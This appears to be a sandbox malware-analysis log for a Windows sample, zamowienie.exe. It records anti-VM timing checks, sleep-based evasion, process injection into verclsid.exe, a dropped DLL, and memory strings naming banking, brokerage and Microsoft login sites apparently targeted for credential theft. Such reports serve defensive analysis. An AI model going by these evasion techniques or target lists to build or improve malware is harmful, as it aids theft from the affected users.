    Source: C:\Windows\SysWOW64\verclsid.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
    Source: C:\Windows\SysWOW64\verclsid.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\zamowienie.exeRDTSC instruction interceptor: First address: 5A39D50 second address: 5A39D50 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F7A411E5F97h 0x00000006 cld 0x00000007 inc ebp 0x00000008 test bh, bh 0x0000000a inc ebx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\zamowienie.exeRDTSC instruction interceptor: First address: 3BF9D50 second address: 3BF9D50 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F7A41C10FF7h 0x00000006 cld 0x00000007 inc ebp 0x00000008 test bh, bh 0x0000000a inc ebx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC16A6 rdtsc 3_2_34FC16A6
    Source: C:\Windows\SysWOW64\verclsid.exeWindow / User API: threadDelayed 3046Jump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeWindow / User API: threadDelayed 6927Jump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz31BB.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\zamowienie.exeAPI coverage: 0.2 %
    Source: C:\Windows\SysWOW64\verclsid.exeAPI coverage: 2.6 %
    Source: C:\Windows\SysWOW64\verclsid.exe TID: 344Thread sleep count: 3046 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exe TID: 344Thread sleep time: -6092000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exe TID: 344Thread sleep count: 6927 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exe TID: 344Thread sleep time: -13854000s >= -30000sJump to behavior
    Source: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe TID: 6444Thread sleep time: -35000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\verclsid.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 0_2_00406751 FindFirstFileA,FindClose,0_2_00406751
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 0_2_00405B80 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,0_2_00405B80
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 0_2_004027CF FindFirstFileA,0_2_004027CF
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EBC460 FindFirstFileW,FindNextFileW,FindClose,7_2_02EBC460
    Source: C:\Users\user\Desktop\zamowienie.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
    Source: 02-E8420l.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
    Source: 02-E8420l.7.drBinary or memory string: discord.comVMware20,11696428655f
    Source: 02-E8420l.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
    Source: 02-E8420l.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
    Source: 02-E8420l.7.drBinary or memory string: global block list test formVMware20,11696428655
    Source: 02-E8420l.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
    Source: zamowienie.exe, 00000003.00000002.2942527960.0000000004DAD000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842830620.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842798539.0000000004DE2000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2942603184.0000000004DE2000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842507580.0000000004DE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: 02-E8420l.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
    Source: 02-E8420l.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
    Source: 02-E8420l.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
    Source: 02-E8420l.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
    Source: 02-E8420l.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
    Source: zamowienie.exe, 00000003.00000003.2842798539.0000000004DE2000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2942603184.0000000004DE2000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842507580.0000000004DE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW!
    Source: 02-E8420l.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
    Source: 02-E8420l.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
    Source: 02-E8420l.7.drBinary or memory string: outlook.office365.comVMware20,11696428655t
    Source: 02-E8420l.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
    Source: verclsid.exe, 00000007.00000002.3906236377.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3906381253.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.3236323767.0000028604DAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: 02-E8420l.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
    Source: 02-E8420l.7.drBinary or memory string: outlook.office.comVMware20,11696428655s
    Source: 02-E8420l.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
    Source: 02-E8420l.7.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
    Source: 02-E8420l.7.drBinary or memory string: AMC password management pageVMware20,11696428655
    Source: 02-E8420l.7.drBinary or memory string: tasks.office.comVMware20,11696428655o
    Source: 02-E8420l.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
    Source: 02-E8420l.7.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
    Source: 02-E8420l.7.drBinary or memory string: interactivebrokers.comVMware20,11696428655
    Source: 02-E8420l.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
    Source: 02-E8420l.7.drBinary or memory string: dev.azure.comVMware20,11696428655j
    Source: 02-E8420l.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
    Source: 02-E8420l.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
    Source: 02-E8420l.7.drBinary or memory string: bankofamerica.comVMware20,11696428655x
    Source: 02-E8420l.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
    Source: 02-E8420l.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
    Source: C:\Users\user\Desktop\zamowienie.exeAPI call chain: ExitProcess graph end nodegraph_0-5141
    Source: C:\Users\user\Desktop\zamowienie.exeAPI call chain: ExitProcess graph end nodegraph_0-5140
    Source: C:\Windows\SysWOW64\verclsid.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC16A6 rdtsc 3_2_34FC16A6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 0_2_00401A43 LdrInitializeThunk,ExpandEnvironmentStringsA,lstrcmpA,0_2_00401A43
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 0_2_73401B28 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,lstrcpyA,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryA,GetProcAddress,lstrlenA,0_2_73401B28
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC14F6 mov eax, dword ptr fs:[00000030h]3_2_34FC14F6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC14F6 mov eax, dword ptr fs:[00000030h]3_2_34FC14F6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F994E0 mov eax, dword ptr fs:[00000030h]3_2_34F994E0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC54DB mov eax, dword ptr fs:[00000030h]3_2_34FC54DB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F234B0 mov eax, dword ptr fs:[00000030h]3_2_34F234B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F974B0 mov eax, dword ptr fs:[00000030h]3_2_34F974B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE74B0 mov eax, dword ptr fs:[00000030h]3_2_34EE74B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE74B0 mov eax, dword ptr fs:[00000030h]3_2_34EE74B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF9486 mov eax, dword ptr fs:[00000030h]3_2_34EF9486
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF9486 mov eax, dword ptr fs:[00000030h]3_2_34EF9486
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB480 mov eax, dword ptr fs:[00000030h]3_2_34EEB480
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC547F mov eax, dword ptr fs:[00000030h]3_2_34FC547F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF1460 mov eax, dword ptr fs:[00000030h]3_2_34EF1460
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF1460 mov eax, dword ptr fs:[00000030h]3_2_34EF1460
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF1460 mov eax, dword ptr fs:[00000030h]3_2_34EF1460
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF1460 mov eax, dword ptr fs:[00000030h]3_2_34EF1460
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF1460 mov eax, dword ptr fs:[00000030h]3_2_34EF1460
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0F460 mov eax, dword ptr fs:[00000030h]3_2_34F0F460
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0F460 mov eax, dword ptr fs:[00000030h]3_2_34F0F460
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0F460 mov eax, dword ptr fs:[00000030h]3_2_34F0F460
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0F460 mov eax, dword ptr fs:[00000030h]3_2_34F0F460
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0F460 mov eax, dword ptr fs:[00000030h]3_2_34F0F460
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0F460 mov eax, dword ptr fs:[00000030h]3_2_34F0F460
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAF453 mov eax, dword ptr fs:[00000030h]3_2_34FAF453
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9B450 mov eax, dword ptr fs:[00000030h]3_2_34F9B450
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9B450 mov eax, dword ptr fs:[00000030h]3_2_34F9B450
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9B450 mov eax, dword ptr fs:[00000030h]3_2_34F9B450
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9B450 mov eax, dword ptr fs:[00000030h]3_2_34F9B450
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFB440 mov eax, dword ptr fs:[00000030h]3_2_34EFB440
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFB440 mov eax, dword ptr fs:[00000030h]3_2_34EFB440
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFB440 mov eax, dword ptr fs:[00000030h]3_2_34EFB440
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFB440 mov eax, dword ptr fs:[00000030h]3_2_34EFB440
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFB440 mov eax, dword ptr fs:[00000030h]3_2_34EFB440
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFB440 mov eax, dword ptr fs:[00000030h]3_2_34EFB440
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F77410 mov eax, dword ptr fs:[00000030h]3_2_34F77410
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1340D mov eax, dword ptr fs:[00000030h]3_2_34F1340D
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F115F4 mov eax, dword ptr fs:[00000030h]3_2_34F115F4
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F115F4 mov eax, dword ptr fs:[00000030h]3_2_34F115F4
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F115F4 mov eax, dword ptr fs:[00000030h]3_2_34F115F4
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F115F4 mov eax, dword ptr fs:[00000030h]3_2_34F115F4
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F115F4 mov eax, dword ptr fs:[00000030h]3_2_34F115F4
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F115F4 mov eax, dword ptr fs:[00000030h]3_2_34F115F4
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F6D5D0 mov eax, dword ptr fs:[00000030h]3_2_34F6D5D0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F6D5D0 mov ecx, dword ptr fs:[00000030h]3_2_34F6D5D0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC35D7 mov eax, dword ptr fs:[00000030h]3_2_34FC35D7
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC35D7 mov eax, dword ptr fs:[00000030h]3_2_34FC35D7
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC35D7 mov eax, dword ptr fs:[00000030h]3_2_34FC35D7
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F195DA mov eax, dword ptr fs:[00000030h]3_2_34F195DA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F255C0 mov eax, dword ptr fs:[00000030h]3_2_34F255C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC55C9 mov eax, dword ptr fs:[00000030h]3_2_34FC55C9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1F5B0 mov eax, dword ptr fs:[00000030h]3_2_34F1F5B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1F5B0 mov eax, dword ptr fs:[00000030h]3_2_34F1F5B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1F5B0 mov eax, dword ptr fs:[00000030h]3_2_34F1F5B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1F5B0 mov eax, dword ptr fs:[00000030h]3_2_34F1F5B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1F5B0 mov eax, dword ptr fs:[00000030h]3_2_34F1F5B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1F5B0 mov eax, dword ptr fs:[00000030h]3_2_34F1F5B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1F5B0 mov eax, dword ptr fs:[00000030h]3_2_34F1F5B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1F5B0 mov eax, dword ptr fs:[00000030h]3_2_34F1F5B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1F5B0 mov eax, dword ptr fs:[00000030h]3_2_34F1F5B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F835BA mov eax, dword ptr fs:[00000030h]3_2_34F835BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F835BA mov eax, dword ptr fs:[00000030h]3_2_34F835BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F835BA mov eax, dword ptr fs:[00000030h]3_2_34F835BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F835BA mov eax, dword ptr fs:[00000030h]3_2_34F835BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAF5BE mov eax, dword ptr fs:[00000030h]3_2_34FAF5BE
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F8D5B0 mov eax, dword ptr fs:[00000030h]3_2_34F8D5B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F8D5B0 mov eax, dword ptr fs:[00000030h]3_2_34F8D5B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC35B6 mov eax, dword ptr fs:[00000030h]3_2_34FC35B6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F115A9 mov eax, dword ptr fs:[00000030h]3_2_34F115A9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F115A9 mov eax, dword ptr fs:[00000030h]3_2_34F115A9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F115A9 mov eax, dword ptr fs:[00000030h]3_2_34F115A9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F115A9 mov eax, dword ptr fs:[00000030h]3_2_34F115A9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F115A9 mov eax, dword ptr fs:[00000030h]3_2_34F115A9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE758F mov eax, dword ptr fs:[00000030h]3_2_34EE758F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE758F mov eax, dword ptr fs:[00000030h]3_2_34EE758F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE758F mov eax, dword ptr fs:[00000030h]3_2_34EE758F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7B594 mov eax, dword ptr fs:[00000030h]3_2_34F7B594
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7B594 mov eax, dword ptr fs:[00000030h]3_2_34F7B594
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2B570 mov eax, dword ptr fs:[00000030h]3_2_34F2B570
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2B570 mov eax, dword ptr fs:[00000030h]3_2_34F2B570
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB562 mov eax, dword ptr fs:[00000030h]3_2_34EEB562
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9B550 mov eax, dword ptr fs:[00000030h]3_2_34F9B550
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9B550 mov eax, dword ptr fs:[00000030h]3_2_34F9B550
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9B550 mov eax, dword ptr fs:[00000030h]3_2_34F9B550
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2D530 mov eax, dword ptr fs:[00000030h]3_2_34F2D530
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2D530 mov eax, dword ptr fs:[00000030h]3_2_34F2D530
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC5537 mov eax, dword ptr fs:[00000030h]3_2_34FC5537
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAB52F mov eax, dword ptr fs:[00000030h]3_2_34FAB52F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFD534 mov eax, dword ptr fs:[00000030h]3_2_34EFD534
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFD534 mov eax, dword ptr fs:[00000030h]3_2_34EFD534
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFD534 mov eax, dword ptr fs:[00000030h]3_2_34EFD534
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFD534 mov eax, dword ptr fs:[00000030h]3_2_34EFD534
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFD534 mov eax, dword ptr fs:[00000030h]3_2_34EFD534
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFD534 mov eax, dword ptr fs:[00000030h]3_2_34EFD534
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9F525 mov eax, dword ptr fs:[00000030h]3_2_34F9F525
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9F525 mov eax, dword ptr fs:[00000030h]3_2_34F9F525
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9F525 mov eax, dword ptr fs:[00000030h]3_2_34F9F525
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9F525 mov eax, dword ptr fs:[00000030h]3_2_34F9F525
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9F525 mov eax, dword ptr fs:[00000030h]3_2_34F9F525
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9F525 mov eax, dword ptr fs:[00000030h]3_2_34F9F525
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9F525 mov eax, dword ptr fs:[00000030h]3_2_34F9F525
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F27505 mov eax, dword ptr fs:[00000030h]3_2_34F27505
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F27505 mov ecx, dword ptr fs:[00000030h]3_2_34F27505
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAD6F0 mov eax, dword ptr fs:[00000030h]3_2_34FAD6F0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1D6E0 mov eax, dword ptr fs:[00000030h]3_2_34F1D6E0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1D6E0 mov eax, dword ptr fs:[00000030h]3_2_34F1D6E0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F836EE mov eax, dword ptr fs:[00000030h]3_2_34F836EE
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F836EE mov eax, dword ptr fs:[00000030h]3_2_34F836EE
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F836EE mov eax, dword ptr fs:[00000030h]3_2_34F836EE
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F836EE mov eax, dword ptr fs:[00000030h]3_2_34F836EE
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F836EE mov eax, dword ptr fs:[00000030h]3_2_34F836EE
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F836EE mov eax, dword ptr fs:[00000030h]3_2_34F836EE
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F236EF mov eax, dword ptr fs:[00000030h]3_2_34F236EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFB6C0 mov eax, dword ptr fs:[00000030h]3_2_34EFB6C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFB6C0 mov eax, dword ptr fs:[00000030h]3_2_34EFB6C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFB6C0 mov eax, dword ptr fs:[00000030h]3_2_34EFB6C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFB6C0 mov eax, dword ptr fs:[00000030h]3_2_34EFB6C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFB6C0 mov eax, dword ptr fs:[00000030h]3_2_34EFB6C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFB6C0 mov eax, dword ptr fs:[00000030h]3_2_34EFB6C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB16CC mov eax, dword ptr fs:[00000030h]3_2_34FB16CC
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB16CC mov eax, dword ptr fs:[00000030h]3_2_34FB16CC
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB16CC mov eax, dword ptr fs:[00000030h]3_2_34FB16CC
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB16CC mov eax, dword ptr fs:[00000030h]3_2_34FB16CC
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAF6C7 mov eax, dword ptr fs:[00000030h]3_2_34FAF6C7
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F216CF mov eax, dword ptr fs:[00000030h]3_2_34F216CF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EED6AA mov eax, dword ptr fs:[00000030h]3_2_34EED6AA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EED6AA mov eax, dword ptr fs:[00000030h]3_2_34EED6AA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE76B2 mov eax, dword ptr fs:[00000030h]3_2_34EE76B2
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE76B2 mov eax, dword ptr fs:[00000030h]3_2_34EE76B2
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE76B2 mov eax, dword ptr fs:[00000030h]3_2_34EE76B2
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7368C mov eax, dword ptr fs:[00000030h]3_2_34F7368C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7368C mov eax, dword ptr fs:[00000030h]3_2_34F7368C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7368C mov eax, dword ptr fs:[00000030h]3_2_34F7368C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7368C mov eax, dword ptr fs:[00000030h]3_2_34F7368C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F29660 mov eax, dword ptr fs:[00000030h]3_2_34F29660
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F29660 mov eax, dword ptr fs:[00000030h]3_2_34F29660
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F8D660 mov eax, dword ptr fs:[00000030h]3_2_34F8D660
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF626 mov eax, dword ptr fs:[00000030h]3_2_34EEF626
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF626 mov eax, dword ptr fs:[00000030h]3_2_34EEF626
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF626 mov eax, dword ptr fs:[00000030h]3_2_34EEF626
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF626 mov eax, dword ptr fs:[00000030h]3_2_34EEF626
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF626 mov eax, dword ptr fs:[00000030h]3_2_34EEF626
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF626 mov eax, dword ptr fs:[00000030h]3_2_34EEF626
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF626 mov eax, dword ptr fs:[00000030h]3_2_34EEF626
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF626 mov eax, dword ptr fs:[00000030h]3_2_34EEF626
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF626 mov eax, dword ptr fs:[00000030h]3_2_34EEF626
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC5636 mov eax, dword ptr fs:[00000030h]3_2_34FC5636
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2F603 mov eax, dword ptr fs:[00000030h]3_2_34F2F603
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F21607 mov eax, dword ptr fs:[00000030h]3_2_34F21607
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF3616 mov eax, dword ptr fs:[00000030h]3_2_34EF3616
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF3616 mov eax, dword ptr fs:[00000030h]3_2_34EF3616
